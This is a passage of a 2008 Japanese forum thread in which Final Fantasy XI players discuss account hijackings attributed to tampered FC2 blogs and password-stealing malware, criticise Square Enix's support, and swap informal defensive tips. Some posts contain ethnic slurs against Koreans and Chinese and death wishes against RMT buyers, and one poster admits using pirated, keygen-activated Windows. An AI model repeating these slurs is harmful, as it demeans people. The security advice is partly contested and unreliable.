549 名前:既にその名前は使われています [2008/03/25(火) 09:30:04.35 ID:sGs0zFvT]
このゲームをやると個人情報を抜かれると広まるゲームは末期症状。
4亀かで言われてたが、本当に末期臭漂ってるよな。
中華に名前住所なんか知られたくねー!女性なんかとくにだろうに…。
なんかリアル事件の原因になってからじゃおせぇのに。

550 名前:既にその名前は使われています [2008/03/25(火) 09:35:00.81 ID:+BGb3nuS]
ハックされたプレイヤーの登録住所にチョンが強盗殺人とか多発しそうで嫌だたな



551 名前:既にその名前は使われています [2008/03/25(火) 09:36:10.13 ID:+C1prF/7]
垢ハックは■も対策に限界があるだろうしな・・・
ユーザー側の問題もあるし
が、せめてそうなった時に迅速な対応が出来るようには流石にして欲しいよ
自分で入れないのに本人がインして連絡してくださいってアホか・・・

登録してる住所に直に緊急時にアカを凍結できるパスとか送ってもらって、
それで自分で何とかできるようにとかならんかねー

552 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:42:38.35 ID:49rjbgT+]
韓国のリネージュですら対策と告知してるのに
国産のFFは完全にスルーだもんなあ
ただでさえ末期でフレが居るから続けてるのに
フレ居なくなれば引退する人増えるのが■eにはわからんのかねえ

553 名前:既にその名前は使われています [2008/03/25(火) 09:46:35.75 ID:+C1prF/7]
> 139 名前: 既にその名前は使われています 投稿日: 2008/03/25(火) 09:42:51.34 ID:kWaFMAAa
> 北米サイトの垢ハック救済宣言
> www.playonline.com/ff11us/polnews/news12495.shtml
>
> 日本人は舐められてるんだよ

なんだこりゃ('A`)

554 名前:既にその名前は使われています [2008/03/25(火) 09:46:47.90 ID:ULE77qbQ]

自作マシン複数台持ってて、OS(XP)はコピー+キージェネ生成プロダクトキーでずっと
使ってたんだけれど、
(だって実機はもとより仮想マシンとか入れてるといちいち全部買うのもアレだし認証
するの面倒なんだもん・・・(言い訳)
いつからかアクティベーションが厳しくなって、WindowsUpdateとができなくなった。
1年ぐらい前からIEやWMPもアップデートできない状態だったけれど、
そんなわけで何ヶ月か、最新ではない状態で使ってるわけだけれど、これって危ないで
すか?

セキュリティーツール(ウィルス対策・スパイウェア対策・FW・PG2)は大体ぬかりな
く入れていても、危ないですか?
今のところハックはされてないんだけど・・・
早急にどうにかしたほうがいいですかね?

というかこのままでもWindowsUpdateする方法ってありますかね?



555 名前:既にその名前は使われています [2008/03/25(火) 09:47:52.30 ID:ymC/GTmn]
いくらなんでも分かってるだろうな
そのケツを叩くしかない

556 名前:既にその名前は使われています [2008/03/25(火) 09:48:32.74 ID:+C1prF/7]
>>554
('A`)ハイハイ スゴイスゴイ ガンバッテ

557 名前:既にその名前は使われています [2008/03/25(火) 09:48:56.86 ID:ugsz64L4]
そもそもRMTでギル買う馬鹿が居なかったらこんな事起きないんだよな

RMTerマジで死ね

558 名前:既にその名前は使われています [2008/03/25(火) 09:49:34.99 ID:+C1prF/7]
>>557
('A`)同意だ。

559 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:50:36.52 ID:gwiQ2FCi]
/yes >>557

560 名前:既にその名前は使われています [2008/03/25(火) 09:51:16.36 ID:sGs0zFvT]
せめて■はこれから買い手は一発BANというだけでかなり効果あるだろうに。



561 名前:既にその名前は使われています [2008/03/25(火) 09:51:49.52 ID:Ev13MfKv]
とりあえずPOLでログイン時に注意喚起すべき

562 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:52:00.78 ID:U5OFwJAr]
>>554
そんなお前さんの事情は知らん。
ヤフオクでプロダクトキー買えば?

563 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:52:52.91 ID:cH7gyrCH]
>>554
ワレザー死ね
クズが

564 名前:既にその名前は使われています [2008/03/25(火) 09:53:24.24 ID:k7bWJxpA]
>>561
なんでそんな簡単な事すらしないんだろうな?
イメージが悪くなる?毒餃子の馬鹿シナ畜とやってる事は一緒だよな糞■eは

565 名前:既にその名前は使われています [2008/03/25(火) 09:53:45.83 ID:qlyvOiMi]
>>542
他人の申告で隔離がぽこぽこ出来る方がおかしいだろう普通に考えれば
2垢ならより早く対応できるが、公式で推奨してるわけでもない

本人確認が出来ない以上対応できないなんてのは世間一般の
他のサービスでもごく普通のことだし

当たり散らすだけならガキでもできるし、もうちっと考えろ

>>552
対策はともかく告知してる内容は結局、自分で管理をしっかりしてくださいだけどな
リネも



566 名前:既にその名前は使われています [2008/03/25(火) 09:56:10.58 ID:1JHdDmwn]
クズエニと業者は癒着してるだろ。業者の稼ぎを全部潰さず、
小出しに潰して、そして次の稼ぎを用意してるしな。業者のアカウント代は
相当儲かるんだろうな。

567 名前:既にその名前は使われています [2008/03/25(火) 09:57:57.25 ID:24T8aigI]
>>565
もうちっと考えるのは■だろ
本人がイン出来ないのに本人がインして報告ってなんだ?
土日休みで17時まで?しか電話対応も無理って・・・
業者に土日か17時以降に盗んでくださいね^^って教えてるような物じゃないか・・・

568 名前:既にその名前は使われています [2008/03/25(火) 10:01:02.59 ID:sGs0zFvT]
そして実際その時間にハックされてる訳だからな…。

569 名前:既にその名前は使われています [2008/03/25(火) 10:02:52.27 ID:RlorLQiV]
>>565
サポセンが24時間電話受付しているのなら君の言ってる事も尤もなんだがな

570 名前:既にその名前は使われています [2008/03/25(火) 10:02:52.67 ID:qlyvOiMi]
>>553
なめてるも何も、ハックされたならとにかく早くサポセンに連絡しろ
完全に元の状態に出来ないかもしれないが、出来るだけ早く連絡をくれれば
アカウントを取り返しアイテムを取り戻すための手助けが出来るかもしれない
だから気づいたらすぐサポセンに連絡しろ

この程度のことしか書いてねーよ



571 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:04:11.71 ID:Bcwt/Dfb]
     )、._人_人__,.イ.、._人_人_人
   <´ リ デ ィ ル 返 し て っ !>
    ⌒ v'⌒ヽr -、_  ,r v'⌒ヽr ' ⌒
// // ///:: <   _,ノ`' 、ヽ、_ ノ  ;;;ヽ  //
///// /::::   (y○')`ヽ) ( ´(y○')    ;;|  /
// //,|:::     ( ( /    ヽ) )+     ;| /
/ // |:::     +  ) )|~ ̄ ̄~.|( (       ;;;|// ////
/// :|::       ( (||||! i: |||! !| |) )      ;;;|// ///
////|::::    +   U | |||| !! !!||| :U   ;;; ;;;| ///
////|:::::       | |!!||l ll|| !! !!| |    ;;;;;;| ////
// / ヽ:::::       | ! || | ||!!|    ;;;;;;/// //
// // ゝ:::::::: :   | `ー----−' |__////

572 名前:既にその名前は使われています [2008/03/25(火) 10:17:16.54 ID:qu/cuoZy]
>>519
403だがそこまでアホじゃないw別のいくつか使って検索したぜ

ブラウザもIEじゃなくて火狐辺りに変えようかな

573 名前:既にその名前は使われています [2008/03/25(火) 10:18:18.39 ID:ugsz64L4]
ID:qlyvOiMi
は□eの犬ですか?

574 名前:既にその名前は使われています [2008/03/25(火) 10:19:22.10 ID:/kuEh7er]
そんなに流行ってるのか〜
まぁ俺のアカでインしてもあるのはレベル8のモンクと金4000ギルだけどw

575 名前:既にその名前は使われています [2008/03/25(火) 10:20:15.70 ID:jlEhOE2N]
お前ら卒業のチャンスだぞ!
fcブログ見まくれ!

576 名前:85 mailto:sage [2008/03/25(火) 10:22:36.16 ID:7wVXiakm]
>>521
私の場合は恥ずかしい話ですがセキュリティーソフトは入れていませんでした。
先週の始め頃にFF自体がかなり重くなっていたので、「不要なソフトは削除しちゃえ」って感じでアンインストール。
その前まではウィルスバスターを入れていましたが、更新とかはやったことはなかったです。

ブラウザはIE6でバージョンは6.0だと思います。
OSはWindowsXP、アップデートはしたことがありませんorz

ココで挙げられているサイトを回った事はないです。
からくりwikiとカンパニエwikiは見ました。
ブログも2〜3箇所見たことがありますが、覚えていません。
ただし、からくり士で検索して訪問した事は覚えています。

業者に強制的に落とされたのはたぶん、↓を見る限り23:40分頃だと思います。
live27.2ch.net/test/read.cgi/ogame/1205774044/862

普段から気をつけていれば防げる場合もきっとありますので、
みなさんもどうか被害にあわないような方法を選んでください。

577 名前:既にその名前は使われています [2008/03/25(火) 10:23:48.18 ID:RlorLQiV]
なんか火狐に変えれば大丈夫みたいなふいんき(ry だが
それだけじゃだーめよー

Noscriptを使わなきゃINT高い人のIE以下だーよー

578 名前:既にその名前は使われています [2008/03/25(火) 10:25:16.53 ID:ymC/GTmn]
>>570
垢ハックされた人がすぐ連絡したけど
自己責任の範囲だから、警察に連絡してくれ、で終わりだったらしい
スクエニは何もしてくれない

579 名前:既にその名前は使われています [2008/03/25(火) 10:28:43.07 ID:qlyvOiMi]
>>573
犬とかアホか
普通に考えて当たり前のこともわからないで煽る暇があるなら
□がパンクするぐらいにどんどん苦情送ったれ、あほ

ひとまずいまフォームからこういうの送った。
文面はどうでもいいからさっさと24時間サポセン対応しろと送ったれ

最近、アカウントハックによる不正アクセスの被害が増えているにもかかわらず、
サポートセンターが24時間、 365日の対応していないのはおかしいのではないか。
金曜夜に被害にあえば、月曜まで、祝日等あればその分の間、問い合わせることも出来ず、
結果、ハックによる被害の拡大を促すことになっているのではないか。スクエアエニックスとして、
この点をどう考えるのか、もはやユーザーのみに対応させるのは限界に来ているのではないか。
早急に出来る対策として、サポートセンターの24時間対応および土日祝日を含む365日対応を
すべきではないのか。ユーザーが安心して遊べるためにも、対応していただきたいと思う。

580 名前:既にその名前は使われています [2008/03/25(火) 10:28:47.34 ID:7wVXiakm]
それと気になっていた事があったので報告です。
私はPOLにログインする時には、自動でログインするようにした事はありません。
IDを選んで、パスワードを手入力していました。
どこかのレスで、手入力にしておけば…のような書き込みがあったので報告です。



581 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:30:35.74 ID:n/S3mmPO]
>>570

アイテム保障とかは一切書いて無いなぁ


582 名前:既にその名前は使われています [2008/03/25(火) 10:32:07.08 ID:gV659xLe]
朝起きたら垢ハックスレ立ちまくりワロタ
自分もブログではないけどサイト持ってるんで注意喚起しといたよー。
サイトハックは聞いたこと無いけどありえなくは無いから気をつけようと思う。

この件を広めることしか出来ない、自衛を促すことしか出来ないのが悔しい。
でも出来る限りのことはしたい。絶対許せない。

583 名前:既にその名前は使われています [2008/03/25(火) 10:33:11.55 ID:gV659xLe]
>>580
パス何桁?初期のまま?

584 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:33:45.44 ID:n1eE+/LN]
あくまで救済できることがあるかもしれない程度で
ここで報告されてきたGMとのやりとりと変わらないね内容は

585 名前:既にその名前は使われています [2008/03/25(火) 10:34:30.47 ID:kr3RV4oq]
とりあえず■は対策できるまで
競売停止
全てのアイテムをエクレア化にするとか

586 名前:既にその名前は使われています [2008/03/25(火) 10:35:31.66 ID:kr3RV4oq]
あっ宅配、トレード、鯖移動も停止しないとか

587 名前:既にその名前は使われています [2008/03/25(火) 10:35:34.36 ID:FJw0pWtB]
垢ハックってほんとうにあるのか?まわりに被害がないから実感がないんだが
まだ都市伝説感が抜けない

588 名前:既にその名前は使われています [2008/03/25(火) 10:36:35.82 ID:gV659xLe]
>>587
こういうのが抜かれる典型例だなw

589 名前:既にその名前は使われています [2008/03/25(火) 10:37:46.78 ID:/kuEh7er]
>>587
UchinoLSの20人ほどは特に何もないようだが
この乱立の仕方はちょっとおかしいと思うw

590 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:38:47.62 ID:zt9O0nlM]
なんで業者がログインするとこっちが落とされて
パス変えられる間もなく ログインしようとするとイン出来ないの?



591 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:45:30.17 ID:W1flgVyY]
垢ハックの注意は必要だが、垢ハックスレが乱立しすぎるのはどうかと思うぞ。


592 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:46:18.67 ID:n1eE+/LN]
>590
向こうは盗めたらインする前に変更予定のパスを決めておいて
インしてすぐにパスを変更しているんじゃないかな
手動か自動かはわからないけど、仕事wだからね
その辺りは何度も試行していると思う
俺らはどれだけ素早く出来るかなんて試したりしないしw

593 名前:既にその名前は使われています [2008/03/25(火) 10:47:53.71 ID:Yq3GlEaf]
垢ハックについて電凸しようと思うんだが
電話内容を記録するにはどうすればいい?
市販の長細いボイスレコーダー?

594 名前:既にその名前は使われています [2008/03/25(火) 10:48:21.55 ID:ymC/GTmn]
>>589
このスレ乱立を見ても、これまで以上に垢ハックがおきたのが明らか

595 名前:既にその名前は使われています [2008/03/25(火) 10:48:33.34 ID:7wVXiakm]
>>583
8桁です。初めはそのまま使っていましたが、今月の初めに1度変えました。
変えたパスワードも8桁です。
ちょっと思い出したんですが、業者にログインされ、
必死になって変えたパスワードは初期のものでしたね…orz
ここで違うパスワードを入力していれば、もしかしたら大丈夫だったのかもしれません。

596 名前:既にその名前は使われています [2008/03/25(火) 10:49:16.40 ID:wWbeLRfX]
■e追加ディスク発売じゃなくて解約ディスク作るのうまいなwwwwwwwwwwwww

597 名前:既にその名前は使われています [2008/03/25(火) 10:50:35.83 ID:/kuEh7er]
アカハックとか起こるたびに思うんだ
頭のいいやつもいるんだな、と。

598 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 10:51:18.32 ID:U5OFwJAr]
FF内で暴動起こすしかないな。
講義の意思を強調するのにはもってこいだと思うけどな。
明日はわが身。参加する奴増えるだろう。

599 名前:既にその名前は使われています [2008/03/25(火) 10:53:22.07 ID:gV659xLe]
>>590
多重ログインされるとどこまで落とされるか知らないけど、FFトップにもどるだけ?
プレイオンラインからも排除されるの?

FFトップまでしか戻されないならPOLからログアウトしてからログインしなおして
速攻でパス変えるとかしないとダメっぽくね

600 名前:既にその名前は使われています [2008/03/25(火) 10:57:06.22 ID:sGs0zFvT]
>>576
はあ?お前馬鹿ってレベルじゃねーわ。
やられるに決まってるだろが。



601 名前:既にその名前は使われています [2008/03/25(火) 10:59:20.78 ID:rt8/XeXx]
>>598
暴動というかネ実的には禿げでしょう。
サポセン24時間対応要求とかなら、まだ被害受けてない人にもいいかもしれん

602 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:02:21.96 ID:U5OFwJAr]
>>601
そういうこと。こういう抗議ってどうなるんだろうな。
今までは特定のキャラクターに対してだけど
今回については■eに直接要求だからな。
無能のGMが出てきたところで話にならないし
禿げガル行進で騒いでどうなるか知りたいところではある。

603 名前:既にその名前は使われています [2008/03/25(火) 11:04:54.44 ID:RdQuTlo9]
>>600
たしかにひどいがネトゲユーザーが100パー「対策ばっちり、IEプゲラw、アンチウイルス導入済み」
という人ばかりじゃないからな・・・。
普通に電気店やゲーム屋でかってやってるのもいるだろう
が、、確かにひどいな。。。。。

604 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:07:24.51 ID:V1FUYBaL]
というか運営陣はアカハックされた奴のPWや業者と目されている奴のPWをぶっこ抜いて
相似性とか類似性を考え付かないのかね。
まさか動的かつ無重複のランダムPW(6a2fg9e4b0sc1とか)をハック毎につけるわけじゃないだろうし

しっかしおまいら考えてみろよ。業者にSTTをつけたように、今回のハック騒ぎを「運営の対応を改善(迅速に)する」以外で
機械的にできると思うか?FC2ブログの件とかまさに■eにとっては言うだけしかない、蚊帳の外だろ。
(それとも一部MMOのようにblog(というかSNS)を自社管理で扱うか?)

もしもやるとしたらクライアント側に保存する情報からPWを抜く、という手法しかないわけだがそれでもキーロガーであぼんだ。
じゃあキーロガーを検知するソフトを作れという流れになったとしても■eがキーロガー検知ソフトを作ると思うか?

605 名前:既にその名前は使われています [2008/03/25(火) 11:08:33.31 ID:WS4YDPYF]
これもしかしたらスレに書き込む業者対策になるかな

串迎撃部隊@2ch掲示板 -- Boo2008 --
boo.2ch.net/index.html

606 名前:既にその名前は使われています [2008/03/25(火) 11:10:00.52 ID:FJw0pWtB]
もし仮にアイテム戻しが実装されたら、知り合いのPC(漫画喫茶等も)でログインしてアイテム処分して
ハックされましたって通るんかね

607 名前:既にその名前は使われています [2008/03/25(火) 11:12:02.85 ID:skDgfdHL]
キーロガー対策ならID MANAGERというソフトがあり
クリップボードも使用しないのでそこからもpass漏れることはない。
PS2でしかFFしないのでPOLログインで使用できるかは不明。

608 名前:既にその名前は使われています [2008/03/25(火) 11:15:05.39 ID:d16ZpNUU]
>>604
そこら辺は無理だとしても、被害にあったときに
迅速に対応できるようにはして欲しいだろ

今は完全に放置だぜ?イン出来ないのに本人がインして報告しろ
土日祝日はやってません。17時までしか受け付けません。
救済も一切ありません。お前が自分で業者にパスを教えたんだろ?な対応

609 名前:既にその名前は使われています [2008/03/25(火) 11:16:46.89 ID:RdQuTlo9]
>>606
おまえのやりたいことがわからん。。知り合いに嫌がらせしたいだけか?
現状■から言われたらしいことは「救済されるアイテムはエクレアか本人しか持ち得ないアイテム」だけだ

610 名前:既にその名前は使われています [2008/03/25(火) 11:17:45.00 ID:qr3SW834]
>>606
戻されるにしても、警察に被害届けだして不正ログインと認められた場合だけでしょう



611 名前:既にその名前は使われています [2008/03/25(火) 11:22:25.57 ID:OkyXvjGD]
今までは全く知らない人が被害>フレのフレ若しくは知り合いが被害>裏空リンバスのLSメンが被害
>そしてついに一緒に遊ぶフレが被害にあった。
 確実に俺にも近づいてる気がして怖いのでもうPS2のみでやることにした。

612 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:24:04.39 ID:FdVfr1o9]
ソースチェッカーオンラインを知ったのだけど、
fc2でもとりあえずこれで安全度100%のとこなら平気でしょうか?


613 名前:既にその名前は使われています [2008/03/25(火) 11:25:13.84 ID:FJw0pWtB]
>>609>>610
エクレアとかだけかよかった。警察沙汰になったあとなのねこれもよかった
不正にアイテム増殖できちゃいそうで気になった

614 名前:既にその名前は使われています [2008/03/25(火) 11:26:16.27 ID:gV659xLe]
とりあえずパス手打ちにした。
完璧な対策なんてないけど、少しでも抜かれる可能性低いほうが良いよね。

というわけでオススメのキーロガー対策ソフトPLZ

615 名前:既にその名前は使われています [2008/03/25(火) 11:27:35.18 ID:erjVAm8i]
FFに関してはパスワードは一々入力しないほうが安全だなw
俺は最初に入力して記憶させてから一度も変えたことがない。

616 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:29:38.86 ID:KlTCqiN9]
今月FF入ってないが、なんかひでーことになってるみたいだな。

FC2の方からは、何も言ってこないのか?
■eは対応決めるまでに時間かかるだろうから、
とりあえず被害の拡大を食い止めてほしいところだ。

しかしこれ、どう対応すんだろ……。
アカごとに別の日付に巻き戻す、とかできるならやってほしい
レアアイテムが増殖するかもしれんが、消えるよりゃマシだろ

617 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:30:04.19 ID:xV7avn5I]
>>612
まったく作ったばっかりのFC2をチェックしても、警告みたいなのでるよ。
アクセス解析とかそういうのにも反応するから、わからないならあんまり当てにしないほうがいい。
すなおにウィルスソフトとかいれて、IE以外で見るのが安全かな。

618 名前:既にその名前は使われています [2008/03/25(火) 11:30:40.55 ID:ZC7LgN8X]
find.2ch.net/?STR=%A5%CF%A5%C3%A5%AF+board%3A%A5%CD%A5%C8%A5%B2%BC%C2%B6%B7&COUNT=10&TYPE=TITLE&BBS=ALL

「ハック」が含まれているスレが14個・・・
そのうち中身の無いスレがなんとも多い事か・・・

619 名前:既にその名前は使われています [2008/03/25(火) 11:30:54.74 ID:ymC/GTmn]
>>615
・・・

620 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:34:24.37 ID:gCK0NHd/]
パス手で入力、しかもスクリーンキーボード使えばまぁかなりマシになるだろ。

>>619
もう手遅れだよ・・・ 放って置いてあげよう



621 名前:既にその名前は使われています [2008/03/25(火) 11:34:57.77 ID:JIu1wKVr]
ちなみに、自分の場合

最近になってウィルス3個検出。IDとパスは抜かれてない。
IEは自動で最新、ノートンも最新。

IEのキャッシュから検出では無くて、毎日しているバックアップファイルから検出。
なぜかは不明

622 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:35:52.93 ID:FdVfr1o9]
>>617
警告がでるところは見なければいいので、問題ないのですが、
安全度100%のとこでも危険な可能性があるのか知りたかったのです。
あと、現時点で自分のPCがやられてるかどうかを調べるにはカスペルで完全スキャンだけで十分でしょうか?

623 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:38:09.14 ID:5K38i1Dh]
リネージュやROのほうは、キーロガーでパス取ってるんだろうか
それともFFみたいにオートログイン機能あり?

624 名前:既にその名前は使われています [2008/03/25(火) 11:38:29.54 ID:zXG1OqGI]
>>615
お前・・・逆だろjk・・・
業者かてめえ!

625 名前:既にその名前は使われています [2008/03/25(火) 11:40:49.79 ID:XSRb3bc4]
IDとパスを記録したファイルを転送され
それを他PCに上書きすると乗っ取り完了

お手軽過ぎんぞマジで
クレカ登録してたらガンガン使われたりな

626 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:41:27.56 ID:xV7avn5I]
>>622
それいっちゃうと、FC2(つーかサイトの大半)見れないよ。
安全度100%なんてない。

自分がやられてるかどうかは、完全スキャンでほぼ大丈夫だと思うけど、100%かといわれると言い切れないだろう。

昔は、UGのサイトは知識ないなら見るなって感じだったけど
いまは、知識ないならネットすら見るなって感じかな?
嫌な時代ですね。

627 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:42:56.02 ID:7wVXiakm]
>>600>>603
恥ずかしい限りですorzもう…ホント懲りました。
今度からはしっかり防御していきます<(_ _)>

628 名前:既にその名前は使われています [2008/03/25(火) 11:44:28.69 ID:erjVAm8i]
>>624
キーロガーでパス抜かれてる手口が多いんだから少なくとも逆じゃないだろう?


629 名前:既にその名前は使われています [2008/03/25(火) 11:49:52.56 ID:SyInp+jK]
普段からWindowsUpdateやセキュリティソフトの定義ファイルをこまめに更新してる人でも今回はハックされたという人がいる

いつもは普通に見れてた有名な情報サイトやブログにいつの間にか罠が仕込まれていた
業者がどうやってブログのIDやパスを盗み出したかは不明
最新版定義ファイルのノートンやウィルスバスターやAvast!も無反応だった


これ以上自衛しろとか言われても「ネットを一切使うな」、くらいしかないんだよな・・・
この現代社会でネット使うなっていうのも現実的に難しいし
「ネトゲやってるのでアカウント守りたい」「じゃあネット使うな」
これじゃ本末転倒だし

630 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:50:40.96 ID:QVf8SjqO]
>>628
いまのとこキーロガーより、保存したパスを抜かれるほうが多いみたいだよ。
だからPASS入力してないほうが安全!は無い。
手入力だから大丈夫ってのも無いけど。



631 名前:既にその名前は使われています [2008/03/25(火) 11:50:46.30 ID:ugsz64L4]
アカハックされた廃人が自殺!
とかならないと□eは重い腰を上げなそう

632 名前:既にその名前は使われています [2008/03/25(火) 11:50:52.90 ID:QTa0bv0n]
>>628
いやほとんどのケースは記憶させているパスの抜き取りでしょ?

633 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:52:35.37 ID:FdVfr1o9]
>>626
何度もレスありがとう。
名前入れ忘れましたが、>>537>>546が最初の経緯でして、
>>546のアドレスをソースチェッカーオンラインで調べると安全度100%と出たので、
とりえず、現時点では大丈夫という安心を得たかったのです・・・
ネット閲覧とFFのPCが同一という環境でやってたのが悪いのはわかっているのですが、
今日のでネット閲覧専用PC導入を本気で考えています。

634 名前:既にその名前は使われています [2008/03/25(火) 11:56:24.83 ID:erjVAm8i]
>>630
>>632
そうかそうか悪かったな。
ちなみに俺はPC2台でFFのほうは専用端末になってる。



635 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 11:58:20.57 ID:KlTCqiN9]
年度末だから予算取れなくて対応できません

なんてこと言わないよな? ■e……

636 名前:既にその名前は使われています [2008/03/25(火) 12:00:04.57 ID:QTa0bv0n]
なぜ逆ギレ風味w

637 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:00:21.92 ID:xV7avn5I]
>>633
セキュリティ意識が高いのはいいけど、そこまで神経質になると、ほんとネット見れなくないか?
ネット閲覧とFFのPCが一緒で悪いってこともないと思うよ。

心配なら、PSかX箱をお勧め。俺はX箱お勧め。w

638 名前:既にその名前は使われています [2008/03/25(火) 12:00:49.92 ID:erjVAm8i]
じゃあとりあえず、■にはパスワードファイルを移しただけで動くってのを改良してほしいんだが。

639 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:01:39.12 ID:QVf8SjqO]
>>633
ソースみてJavaScriptで変なアドレス入ってなさそうなら平気だとおもう。
ソースチェッカーでそこそこ安全なら大丈夫でしょう。
ただ、これからはfc2アドレスには注意が必要だね。

どーしても、モヤモヤするなら改竄が流行ってるfc2踏んでしまいましたとかで
勇気がなくて踏めない人のための鑑定スレ
pc11.2ch.net/test/read.cgi/hack/1199083602/
で鑑定してもらうとか。

640 名前:既にその名前は使われています [2008/03/25(火) 12:02:15.92 ID:a+CNHbXe]
友人の箱でやってるの見たけど思ってたより綺麗だったわ
箱でやるのももいいかもな
ボタンに慣れてしまえばいっかww



641 名前:既にその名前は使われています [2008/03/25(火) 12:03:19.52 ID:ugsz64L4]
愉快犯のウイルスと違って
生きる為に必死な乞食がやってるだけに恐ろしい

642 名前:既にその名前は使われています [2008/03/25(火) 12:06:32.68 ID:lzAZqpVk]
キーロガーの認識あるならパソコン別にしたら?

銀行や証券のパスワードを抜かれるかも知れないのに。

643 名前:既にその名前は使われています [2008/03/25(火) 12:07:44.91 ID:w09AiedE]
ブログ引越し考えて他人が使ってるブログを検索してみたが
FC2使ってるやつ本当多いね。
しかもアクセス多いところは一日70万アクセスとか…
FFなんか大手つってもせいぜい1000〜2000程度だし
運営から見たら特定ジャンルの僻地ブログがハクられようと痛くも痒くもないのかな。


644 名前:既にその名前は使われています [2008/03/25(火) 12:13:42.22 ID:nfdnKwPN]
んなこたない
クレカ情報とか抜かれてもおかしくない状況なんだから

645 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:14:49.92 ID:n1eE+/LN]
FC2<嫌ならやめてもいいんじゃぞ?

■eにとって現状は想定の範囲内らしい

646 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:15:08.53 ID:FdVfr1o9]
>>637
ありがとう。
こういうの初めてで昨日はカスペルの検索結果が気になって寝付けなかった・・・
かなり寝不足。
PS2ありますよ、パス変更はそちらでやりました。
でも綺麗というだけでPCでやってました。

>>639
おお、そんなスレあるのですね。
最近見たfc2は昨日のだけですし、ソースチェッカーオンラインの結果の、
右枠をみても、自分には知識無くてサッパリなので、そこにお願いしてみようと思います。
ありがとう。

647 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:16:20.74 ID:fAiOj5Ix]
>>635
年度末だからこそ来年度予算をもぎりとるために開発費を使い切るんだ

648 名前:既にその名前は使われています [2008/03/25(火) 12:17:01.49 ID:Q74sBmBw]
糞スレ乱立業者
ID:MAhuB7JG
ID:KZFpz3y9

649 名前:既にその名前は使われています [2008/03/25(火) 12:17:53.00 ID:lzAZqpVk]
その割にはFFのアカウントしか興味ないみたいだなネ実民はw

650 名前:既にその名前は使われています [2008/03/25(火) 12:26:14.21 ID:LtRgK+Go]
>>553
北米はアイテム返してくれるのかよw
俺のフレは被害届け警察に出してもエクレアも返してもらえないって言ってたぞ



651 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:27:06.43 ID:fAiOj5Ix]
>>649
身近な問題なだけに他の連中に訴えやすいしな。
非FF11系FC2メンバーの「そんなの関係ねー」を見ていればわかるとおもうが。
たとえばこの板で(今回の件が全く無かったとして)
「FF11のブログが垢ハックウイルス入りに改竄される件」と「FC2ブログが誰かに改竄される件」
というスレを立てた場合、前者のほうがこの板住民の興味を引くだろ。

652 名前:既にその名前は使われています [2008/03/25(火) 12:28:16.66 ID:fAiOj5Ix]
>>650
そこでGMに問い詰めるんだ!

653 名前:既にその名前は使われています [2008/03/25(火) 12:29:43.77 ID:Lh3BMw3A]
今入ろうとしたらパスワード変わってる!!
サポセン混雑して電話繋がらないけどハック対応専用窓口ある???

654 名前:既にその名前は使われています [2008/03/25(火) 12:30:57.08 ID:ugsz64L4]
被害者ktkr

655 名前:既にその名前は使われています [2008/03/25(火) 12:32:15.24 ID:CE2JkWXV]
スクウェア・エニックス インフォメーションセンター
0570-003-399

656 名前:既にその名前は使われています [2008/03/25(火) 12:32:52.14 ID:erjVAm8i]
>>653
ないよ。
こりゃ、当分PS2か箱でやったほうがいいな。

657 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:33:45.10 ID:xV7avn5I]
前日に自分でパス変更して、忘れてるとかじゃないだろうな?

>ハック対応専用窓口
そんなのあったら、ここまで騒ぎになってないだろう・・・。
がんばって電話するしかないだろうな。がんばれ。

658 名前:既にその名前は使われています [2008/03/25(火) 12:33:56.00 ID:pn98/92E]
>>526
国センにクレーム入れるぐらいか?
後は政治家の事務所に陳情入れるとか?
ネトゲ専用の活動家になってこういった不正アクセスとかの問題に取り組むとか?

659 名前:既にその名前は使われています [2008/03/25(火) 12:36:57.87 ID:UPF6TRxO]
>>553
なんだこれ・・・





なんて書いてあるか解らん

660 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 12:37:48.09 ID:7wVXiakm]
>>653
繋がるまで頑張ってかけてみて!



661 名前:既にその名前は使われています [2008/03/25(火) 12:40:32.74 ID:erjVAm8i]
まあ繋げってからが問題なんだけどな・・・
一度でもサポセンにかけたことのあるやつは知ってると思うが、
基本的にこちらの質問を理解しないで回答してるからね。
定型の回答しかかえってこないから、会話してて???となるよ。


662 名前:既にその名前は使われています [2008/03/25(火) 12:40:48.97 ID:hpQdjsfd]
週末が比較的おとなしかったから安堵してたのに、ここ二日くらいで大変なことになってるな
もう金曜じゃなくてサポセンが閉まってる時間は奴らの活動時間と見た方がいいか

663 名前:既にその名前は使われています [2008/03/25(火) 12:41:32.87 ID:gnv8Cqm9]
「パスは入力保存してた」って展開に100メセタ

664 名前:既にその名前は使われています [2008/03/25(火) 12:43:07.87 ID:ZC7LgN8X]
>>659
Google先生に訳してもらった

最近では、それはスクウェアエニックスの注目を集めて来て不幸な数のアカウントにアクセスできるように選手たちが失われた彼らのために、第三者から侵害になる。
